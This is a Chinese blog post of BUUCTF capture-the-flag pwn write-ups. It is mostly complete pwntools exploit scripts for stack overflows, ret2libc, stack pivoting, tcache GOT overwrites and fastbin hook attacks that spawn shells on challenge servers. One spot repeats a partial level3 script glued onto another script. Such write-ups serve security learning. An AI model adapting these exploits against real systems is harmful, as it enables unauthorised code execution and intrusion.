BUU PWN (二)

最新推荐文章于 2024-05-11 11:00:28 发布
最新推荐文章于 2024-05-11 11:00:28 发布
阅读量825 收藏
点赞数
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39268483/article/details/104210714
版权

BUU PWN (二)

level0

from pwn import *
#p=process('./level0')
p=remote("node3.buuoj.cn","26684")
p.recvline()
payload='a'*0x80+'a'*8+p64(0x400596)
p.sendline(payload)
p.interactive()

ciscn_2019_n_5

ret2libc 注意retn到system时栈要为0x10的倍数

from pwn import *
from LibcSearcher import *
context.log_level='debug'
#p=process('./ciscn_2019_n_5')
p=remote("node3.buuoj.cn","28393")
elf=ELF("./ciscn_2019_n_5")
p.recvline()
p.sendline('1')
p.recvline()
p.recvline()
payload='a'*0x20+'a'*8+p64(0x400713)+p64(elf.got['puts'])+p64(elf.symbols['puts'])+p64(0x400636)
p.sendline(payload)

puts_got=u64(p.recv(6)+'\x00\x00')
print hex(puts_got)
libc=LibcSearcher('puts',puts_got)
libc_base=puts_got-libc.dump('puts')
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')


p.recvuntil("tell me your name\n")
p.sendline('1')
p.recvline()
p.recvline()
paylaod1='a'*0x20+'a'*8+p64(0x4006aa)+p64(0x400713)+p64(bin_sh)+p64(system)
p.sendline(paylaod1)
p.interactive()

ciscn_2019_es_2

题目为32位程序,只能溢出到返回地址,想到了之前的frame faking,且程序正好可以泄露栈地址,将rop链劫持到栈上输入变量的地方即可

from pwn import *
context.log_level='debug'
#p=process('./ciscn_2019_es_2')
p=remote("node3.buuoj.cn","25831")
p.recvline()
#gdb.attach(p,"b *0x080485f4")
payload='a'*0x20+'a'*8
p.send(payload)#leak stack_addr
p.recvuntil('a'*0x28)
stack_addr=u32(p.recv(4))
print hex(stack_addr)
addr=stack_addr-0x38

payload1='a'*4+p32(0x08048400)+'aaaa'+p32(addr+0x10)+'/bin/sh\x00'+'a'*0x10+p32(addr)+p32(0x080485fd)
p.send(payload1)
p.interactive()

ciscn_2019_n_3

程序环境为ubantu18,32位程序,自然而然想到了利用tache,且程序可以覆写got表,并且没开PIE,自然想到覆写got表,而且程序还给了system函数。但是delete是record结构体堆块和record一起释放,而利用free两次任意地址写的攻击方式,对record结构体不适用(record结构体自动赋值,且赋值第一个值为一个函数地址,代码段不可写,会出现地址错误)

不过可以malloc一个和record结构体大小的record,这样就可以绕过。

再接着覆写got表时,由于fgets函数会读取换行覆盖free函数got表时顺带改写了后面一个fgets函数,导致fgets函数出错

可以将fgets函数的got表重新赋值为fgets的延迟定位函数,让他重新定位。

from pwn import *
from LibcSearcher import *
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
context.log_level='debug'
#p=process('./ciscn_2019_n_3')
p=remote("node3.buuoj.cn","26778")
def add(index,size,payload):
    p.recvuntil('CNote > ')
    p.sendline('1')
    p.recvuntil('Index > ')
    p.sendline(str(index))
    p.recvuntil('Type > ')
    p.sendline('2')
    p.recvuntil('Length > ')
    p.sendline(str(size))
    p.recvuntil('Value > ')
    p.sendline(payload)
def show(index):
    p.recvuntil('CNote > ')
    p.sendline('3')
    p.recvuntil('Index > ')
    p.sendline(str(index))
def delete(index):
    p.recvuntil('CNote > ')
    p.sendline('2')
    p.recvuntil('Index > ')
    p.sendline(str(index))
add(0,0x20,'0')
add(1,0xc,'1')
delete(0)
delete(0)
delete(1)
add(2,0x20,p32(0x0804b010))
add(3,0x20,p32(0x0804b010))
#gdb.attach(p,"b *0x0804875e")
add(4,0x20,p32(0x08048500)+p32(0x080484b6))
add(5,0x30,'/bin/sh')
delete(5)
#gdb.attach(p)
p.interactive()

roarctf_2019_easy_pwn

题目有着单字节溢出漏洞,利用其修改size,达到溢出效果,实现fastbin_attack但是malloc_hook下的one_gadget全部失效。只有用到free_hook来解题了。

看了一眼网上的wp是用realloc调整栈来达到one_gadget重新生效。

参考链接如下:https://xz.aliyun.com/t/6559

也就是说将malloc_hook上写上realloc函数的地址+偏移,

而realloc_hook上写上one_gadget。

realloc控制好栈之后,执行onegadget的一个操作

free_hook

from pwn import *
context.log_level='debug'
#p=process('./roarctf_2019_easy_pwn')
p=remote("node3.buuoj.cn","25927")
def add(size):
    p.recvuntil("choice: ")
    p.sendline('1')
    p.recvuntil('size: ')
    p.sendline(str(size))
def edit(index,size,payload):
    p.recvuntil("choice: ")
    p.sendline('2')
    p.recvuntil("index: ")
    p.sendline(str(index))
    p.recvuntil("size: ")
    p.sendline(str(size))
    p.recvuntil("content: ")
    p.send(payload)
def show(index):
    p.recvuntil("choice: ")
    p.sendline("4")
    p.recvuntil("index: ")
    p.sendline(str(index))
def delete(index):
    p.recvuntil("choice: ")
    p.sendline("3")
    p.recvuntil("index: ")
    p.sendline(str(index))
add(0x18)#0
add(0x18)#1
add(0x80)#2
add(0x18)#3
edit(0,34,'a'*0x18+'\xb1')
delete(1)
add(0xa0)#1
payload='\x00'*0x18+p64(0x91)+0x80*'\x00'
edit(1,0xa0,payload)
delete(2)
show(1)
p.recvuntil('\x91'+'\x00'*7)
main_arena=u64(p.recv(6)+'\x00'+'\x00')-88
libc_base=main_arena-0x3c4b20
malloc_hook=main_arena-0x10
fake_chunk=malloc_hook-0x8-3
#one_gadget=libc_base+0x4526a#0x4526a #45216 #f02a4 f1147
free_hook=libc_base+0x3c67a8
fake=free_hook-0xb58
system=libc_base+0x45390
print hex(malloc_hook)
print hex(fake_chunk)
print hex(fake)
print hex(free_hook)
add(0x68)#2

delete(2)
payload1='\x00'*0x18+p64(0x71)+p64(fake_chunk)
edit(1,len(payload1),payload1)
add(0x68)#2
add(0x68)#4
payload2='\x00'*3+'\x00'*0x60+p64(fake)[0:6]
edit(4,0x68+10,payload2)

#print hex(one_gadget)
for i in range(10):
    add(0x100)

add(0x100)
payload3="/bin/sh\x00"+'\x00'*0xa0+p64(system)
edit(15,len(payload3),payload3)
delete(15)
#gdb.attach(p)
p.interactive()

realloc_hook

from pwn import *
context.log_level='debug'
p=process('./roarctf_2019_easy_pwn')
#p=remote("node3.buuoj.cn","25927")
def add(size):
    p.recvuntil("choice: ")
    p.sendline('1')
    p.recvuntil('size: ')
    p.sendline(str(size))
def edit(index,size,payload):
    p.recvuntil("choice: ")
    p.sendline('2')
    p.recvuntil("index: ")
    p.sendline(str(index))
    p.recvuntil("size: ")
    p.sendline(str(size))
    p.recvuntil("content: ")
    p.send(payload)
def show(index):
    p.recvuntil("choice: ")
    p.sendline("4")
    p.recvuntil("index: ")
    p.sendline(str(index))
def delete(index):
    p.recvuntil("choice: ")
    p.sendline("3")
    p.recvuntil("index: ")
    p.sendline(str(index))
add(0x18)#0
add(0x18)#1
add(0x80)#2
add(0x18)#3
edit(0,34,'a'*0x18+'\xb1')
delete(1)
add(0xa0)#1
payload='\x00'*0x18+p64(0x91)+0x80*'\x00'
edit(1,0xa0,payload)
delete(2)
show(1)
p.recvuntil('\x91'+'\x00'*7)
main_arena=u64(p.recv(6)+'\x00'+'\x00')-88
libc_base=main_arena-0x3c4b20
malloc_hook=main_arena-0x10
fake_chunk=malloc_hook-0x20-3
one_gadget=libc_base+0xf1147#0x4526a #45216 #f02a4 f1147
free_hook=libc_base+0x3c67a8
fake=free_hook-0xb58
system=libc_base+0x45390
realloc=libc_base+0x846c0
print hex(malloc_hook)
print hex(fake_chunk)
print hex(fake)
print hex(free_hook)
add(0x68)#2

delete(2)
payload1='\x00'*0x18+p64(0x71)+p64(fake_chunk)
edit(1,len(payload1),payload1)
add(0x68)#2
add(0x68)#4
payload2='\x00'*3+'\x00'*8+p64(one_gadget)+p64(realloc+4)
edit(4,len(payload2),payload2)


#gdb.attach(p)
add(0x40)
p.interactive()

level2

from pwn import *
context.log_level='debug'
#p=process('./level2')
p=remote("node3.buuoj.cn","28171")
p.recvline()
payload='a'*0x88+'a'*4+p32(0x08048320)+'a'*4+p32(0x0804a024)
p.sendline(payload)
p.interactive()

level2_x64

from pwn import *
#p=process('./level2_x64')
p=remote("node3.buuoj.cn","28937")
p.recvline()
payload='a'*0x80+'a'*8+p64(0x4006b3)+p64(0x600a90)+p64(0x4004c0)
p.sendline(payload)
p.interactive()

jarvisoj_tell_me_something

from pwn import *
context.log_level='debug'
#p=process('./guestbook')
p=remote("node3.buuoj.cn","29021")
p.recvline()
payload='a'*0x88+p64(0x400620)
#gdb.attach(p,"b *0x400620")
p.sendline(payload)
p.recv()
p.interactive()

[Black Watch 入群题]PWN

framefaking不过注意转移到堆上时地址尽量向后开辟

from pwn import *
from LibcSearcher import *
context.log_level='debug'
bss=0x0804a300
#p=process('./spwn')
p=remote("node3.buuoj.cn","27659")
elf=ELF('./spwn')
p.recvuntil("name?")
payload='a'*0x180+p32(bss+0x1b0)+p32(elf.symbols['write'])+p32(0x080485a9)+p32(1)+p32(elf.got['read'])+p32(4)+p32(elf.symbols['read'])+p32(0x080485a9)+p32(0x0)+p32(bss+0x1b0)+p32(bss+0x1b0)+p32(0x08048511)
p.send(payload)
p.recvuntil("say?")
#gdb.attach(p,"b *0x08048511")
payload1='a'*0x18+p32(bss+0x180)+p32(0x08048511)
p.send(payload1)

puts_addr=u32(p.recv(4))
print hex(puts_addr)

system_addr=puts_addr-0x99a10
binsh_addr=puts_addr+0x84cdb
payload2='a'*4+p32(system_addr)+'a'*4+p32(binsh_addr)
p.sendline(payload2)

p.interactive()from pwn import *
context.log_level='debug'
#p=process('./level3')
p=remote("node3.buuoj.cn","26554")
elf=ELF('./level3')
p.recvline()
payload='a'*0x88+'a'*4+p32(elf.symbols['write'])+p32(0x08048484)+p32(1)+p32(elf.got['write'])+p32(4)
p.sendline(payload)
puts_addr=u32(p.recv(4))

level3

from pwn import *
context.log_level='debug'
#p=process('./level3')
p=remote("node3.buuoj.cn","26554")
elf=ELF('./level3')
p.recvline()
payload='a'*0x88+'a'*4+p32(elf.symbols['write'])+p32(0x08048484)+p32(1)+p32(elf.got['write'])+p32(4)
p.sendline(payload)
puts_addr=u32(p.recv(4))

print hex(puts_addr)
system=puts_addr-0x99a80
bin_sh=puts_addr+0x84c6b
p.recvline()
payload1='a'*0x88+'a'*4+p32(system)+'a'*4+p32(bin_sh)
p.sendline(payload1)

p.interactive()

level3_x64

from pwn import *
context.log_level='debug'
#p=process('./level3_x64')
p=remote("node3.buuoj.cn","29589")
elf=ELF('./level3_x64')
pop_rdi=0x4006b3
pop_rsi_r15=0x4006b1
p.recvline()
payload='a'*0x80+'a'*8+p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(elf.got['write'])+'a'*8+p64(elf.symbols['write'])+p64(0x40061a)
p.sendline(payload)
write_addr=u64(p.recv(6)+'\x00\x00')
print hex(write_addr)
p.recv()
system=write_addr-0xb1f20
bin_sh=write_addr+0x95aa7
payload='a'*0x80+'a'*8+p64(pop_rdi)+p64(bin_sh)+p64(system)
p.sendline(payload)
p.interactive()

level4

from pwn import *
context.log_level='debug'
#p=process('./level3')
p=remote("node3.buuoj.cn","25664")
elf=ELF('./level4')
payload='a'*0x88+'a'*4+p32(elf.symbols['write'])+p32(0x08048470)+p32(1)+p32(elf.got['write'])+p32(4)
p.sendline(payload)
puts_addr=u32(p.recv(4))

print hex(puts_addr)
system=puts_addr-0x99a80
bin_sh=puts_addr+0x84c6b
payload1='a'*0x88+'a'*4+p32(system)+'a'*4+p32(bin_sh)
p.sendline(payload1)

p.interactive()

login

程序溢出写入shell地址,用户名密码验证正确后,执行该地址

from pwn import *
context.log_level='debug'
#p=process('./login')
p=remote("node3.buuoj.cn","25187")
p.recvuntil('username: ')
p.sendline('admin')
payload='2jctf_pa5sw0rd'+'\x00'*2+'\x00'*0x38+p64(0x400e88)
p.recvuntil('password: ')
#gdb.attach(p,"b *0x400dae")
p.sendline(payload)
p.interactive()
playmak3r
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
[Black Watch 入群题]PWN-栈迁移
个人笔记
04-20 368
细节详情参考:https://blog.csdn.net/mcmuyanga/article/details/109260008。buf溢出栈空间只有0x20-0x18=8字节无法构造rop,所以需要利用栈迁移技术,迁移到bss上构造rop。bss栈布局:(左边是第一泄露Libc构造栈帧,右边是第二次重写获取shell的栈帧)改变思路:由于此程序没有可直接ret利用的函数同时溢出空间很小,所以需要。栈迁移操作:构造好栈中ebp新位置。思路:ret2shellcode。栈迁移关键指令:leave。
PWN · 栈迁移】[BUUCTF][Black Watch 入群题]PWN
Mr_Fmnwon的博客
08-01 379
进能够覆盖ebp和ret,很难不往栈迁移上想。 修改ebp和ret后我们可以将栈指针指向另一处地址addr,需要ebp修改为ebp-4和ret修改为leave;ret地址。这是触发栈迁移的基本过程。 查看整个代码发现没有后门函数。 2.泄露libc 没有system函数的使用,但是有write函数。我们可以通过write泄露write的真实地址,从而泄露libc的地址。进一步可以拿到system和str_bin_sh的地址。 3.组合流程① read大量数据,可以是 aaaa + write.pl
2024年最新pwn学习笔记 BUU,2024年最新网络安全工程师面试题目和答案
05-11 228
1.14ldd 文件名#查询绝对路径p32()#转字节型数据u32()#转数字hex()#转十六进制数据1.17这三天主要还是看视频和做题,一点点稳步推进吧。shellcraft.sh()#生成shellcode汇编代码asm(shellcraft.sh())#生成shellcode机械代码64位需加入context.arch=“amd64”在做ret2libc题目时为获得函数在got表中的地址,可以在栈溢出之后,劫持程序再次执行已执行过的函数,随后可获得got表内容。
[BUUCTF]PWN——[Black Watch 入群题]PWN
mcmuyanga的博客
10-26 2466
[Black Watch 入群题]PWN——栈劫持 入群题密码在 /password.txt Ubuntu 16 2020年02月27日:此入群题已作废,请看新版入群题。 附件 解题步骤: 例行检查,32位程序,开启了nx保护 运行一下程序,两次输入,测试时发现输入长度过长,会报错 32位ida载入,首先shift+f12查看一下程序里的字符串,没有system函数和‘/bin/sh’的字符串,这边需要我们自己去想办法构造system(‘/bin/sh’) 从main函数开始看程序
BUUCTF】[Black Watch 入群题]PWN
m0_51251108的博客
12-27 395
BUUCTF】[Black Watch 入群题]PWN 记录下刷题,方便自己以后回顾,写的很烂,还请见谅 本题要用栈迁移 先checksec,file和nc看下程序 32位,动态链接,无canary和pie 思路:vul_function()里最后的read能栈溢出,但位置太短,不够写rop,运用栈迁移跳转至跳转至上一个read,写入rop链,ret2libc后就能拿到shell了 主要是如何栈迁移: leave ret相当于: leave => mov esp, ebp; pop ebp
CTF刷题-汇总
热门推荐
~airrudder~
04-09 1万+
BUUCTF平台的刷题之旅 Web
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 793
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
BUUCTF)Black_Watch_入群题_PWN2 (tcache stash unlink attack原理和例题)
xy1458214551的博客
12-25 883
BUUCTF的BlackWatch入群题PWN2的题解,作为经典的tcache stash unlink利用
BUU-pwn(一)
qq_53263789的博客
04-24 309
rip 简单栈溢出,后门函数 exp from pwn import * #io=process("./pwn") r = remote('node4.buuoj.cn',25253) payload=b'a'*0xf+b'a'*0x08+p64(0x0401187) r.sendline(payload) r.interactive() warmup_csaw_2016 后门函数 int sub_40060D() 泄露地址 exp from pwn import * #io=process("./pw
[Black Watch 入群题]PWN 栈劫持的利用
半岛铁盒的博客
08-17 337
32位程序,开启了nx保护 没有system函数和‘/bin/sh’的字符串,这边需要我们自己去想办法构造system(‘/bin/sh’) 思路 第一次输入的参数s,那边我们可以写入很长的数据,我们可以将我们的rop链布置在那里, 接着执行第二次输入,利用站劫持,把程序的执行流程劫持到第一次输入的位置就可以了 站劫持利用 做栈劫持主要用到的是一个leave;ret指令,一般程序执行完成后都会调用leave;ret来还原现场 payload1=‘a’*0x18+p32(s-4)+p32(leave_r
BUUCTF--[Black Watch 入群题]Web
qq_46263951的博客
07-24 961
登录时使用burp suite抓包发现是以json传入的数据 进去之后我们发现单击这三个热点分别会有以下三种响应 因为id=1,所以这里是一个整形注入这里使用的异或盲注
[Black Watch 入群题]Web
SopRomeo的博客
05-28 1771
登录抓包 这是一段以json传入的数据,起初对着这个一直想json注入,然后发现怎样注入都行不通 回到热点列表 发现更改后面的数字会变,谷歌浏览器f12 network 谷歌浏览器f12 network 发现有个php文件,进去 数据存放在这里了,输入双引号的时候发现弹出这个 sql注入无疑了 刚开始的id是1,由此推断可能是整形注入 但是联合查询,报错都没用 bp测试看他究竟过滤了啥 啥都没过滤 卡了挺久的,翻了翻自己博客 极客大挑战finalsql 异或布尔盲注 这题有个坑,他返回.
Buuctf之Web(四)
qq_50589021的博客
11-22 1547
[HFCTF2020]JustEscape WP vm2沙盒逃逸 涉及到nodejs不会 [网鼎杯2018]Unfinish 脚本 # -*- coding: utf-8 -*- # @Author : Yn8rt # @Time : 2021/9/10 14:38 #coding:utf-8 import requests from bs4 import BeautifulSoup import time url = 'http://f8933a3b-5f22-4bde-bde9-7a49c4b
Web-12(45-48)-BUUCTF平台
~airrudder~
08-02 450
本篇内容 [SWPU2019]Web1 [极客大挑战 2019]HardSQL [WesternCTF2018]shrine [BJDCTF 2nd]假猪套天下第一 上一篇 | 目录 | 下一篇 [SWPU2019]Web1 [极客大挑战 2019]HardSQL [WesternCTF2018]shrine [BJDCTF 2nd]假猪套天下第一 ======...
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值